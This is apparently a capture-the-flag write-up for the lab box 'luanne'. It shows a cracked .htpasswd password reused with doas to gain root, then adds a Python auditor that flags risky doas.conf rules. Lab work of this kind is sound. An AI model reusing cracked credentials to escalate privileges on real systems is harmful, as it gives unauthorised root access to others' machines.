Privilege Escalation
Earlier, I learned that the r.michaels user is basically the root user defined by the configuration file of doas.
luanne$ doas -u root id
password:
doas: authentication failed
After making a lateral movement to the r.michaels user, attempting to check the doas command was the first thing that I did.
I failed to do so as it prompted me for a password, which I didn’t have at the time.
Then I found out that the .htpasswd file in the backup archive is different from the .htpasswd file in the /var/www directory.
I followed up by cracking the password hash.
Here, I will test it for password reuse and attempt to escalate privileges to the root user.
luanne$ doas -u root id
password: littlebear
uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)
Password reuse confirmed
luanne$ doas -u root su root
password: littlebear
# whoami
root
# hostname
luanne.htb
# /sbin/ifconfig
vmx0: flags=0x8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
capabilities=7fd80<TSO4,IP4CSUM_Rx,TCP4CSUM_Rx,TCP4CSUM_Tx>
capabilities=7fd80<UDP4CSUM_Rx,UDP4CSUM_Tx,TCP6CSUM_Rx,TCP6CSUM_Tx>
capabilities=7fd80<UDP6CSUM_Rx,UDP6CSUM_Tx,TSO6>
enabled=0
ec_capabilities=7<VLAN_MTU,VLAN_HWTAGGING,JUMBO_MTU>
ec_enabled=2<VLAN_HWTAGGING>
address: 00:50:56:b9:f2:06
media: Ethernet autoselect (10Gbase-T)
status: active
inet 10.10.10.218/24 broadcast 10.10.10.255 flags 0x0
inet6 fe80::250:56ff:feb9:f206%vmx0/64 flags 0x0 scopeid 0x1
lo0: flags=0x8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 33624
inet 127.0.0.1/8 flags 0x0
inet6 ::1/128 flags 0x20<NODAD>
inet6 fe80::1%lo0/64 flags 0x0 scopeid 0x2
System Level Compromise
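The escalation above depended on a doas rule that lets one account act as root with only that account's own password, so any reuse of that password elsewhere becomes a root credential. The following is an added example, not part of the original writeup: a small auditor that flags such rules in a doas.conf. The sample file, the function names and the tag names are constructed for illustration, and rule ordering (the last matching rule wins) is not modelled.

```python
import shlex

FLAG_OPTIONS = {"nopass", "nolog", "persist", "keepenv"}

# Constructed sample, not the configuration from the box in this writeup.
SAMPLE = """\
# constructed sample doas.conf
permit r.michaels as root
permit nopass :wheel as root cmd /sbin/shutdown
permit persist setenv { PATH=/bin:/usr/bin } backup as root
deny guest
"""

def parse_rule(line):
    """Parse: permit|deny [options] identity [as target] [cmd command [args ...]]"""
    tok = shlex.split(line, comments=True)   # drops '#' comments
    if not tok:
        return None
    rule = {"action": tok[0], "options": [], "identity": None,
            "target": None, "cmd": None}
    i = 1
    while i < len(tok):
        if tok[i] in FLAG_OPTIONS:
            rule["options"].append(tok[i]); i += 1
        elif tok[i] == "setenv":              # skip the { ... } block
            rule["options"].append("setenv"); i += 1
            while i < len(tok) and not tok[i].endswith("}"):
                i += 1
            i += 1
        else:
            break
    if i < len(tok):
        rule["identity"] = tok[i]; i += 1
    if i + 1 < len(tok) and tok[i] == "as":
        rule["target"] = tok[i + 1]; i += 2
    if i + 1 < len(tok) and tok[i] == "cmd":
        rule["cmd"] = " ".join(tok[i + 1:])
    return rule

def audit(conf_text):
    """Return (line number, identity, tags) for permit rules worth reviewing."""
    findings = []
    for n, line in enumerate(conf_text.splitlines(), 1):
        r = parse_rule(line)
        if not r or r["action"] != "permit":
            continue
        tags = []
        # No 'as' means any target, root included; no 'cmd' means any command.
        if r["target"] in (None, "root") and r["cmd"] is None:
            tags.append("unrestricted-root")
        if "nopass" in r["options"]:
            tags.append("nopass")
        if tags:
            findings.append((n, r["identity"], tags))
    return findings
```

An "unrestricted-root" finding means the listed account's password is as sensitive as root's, so it must not be shared with web credentials such as .htpasswd entries.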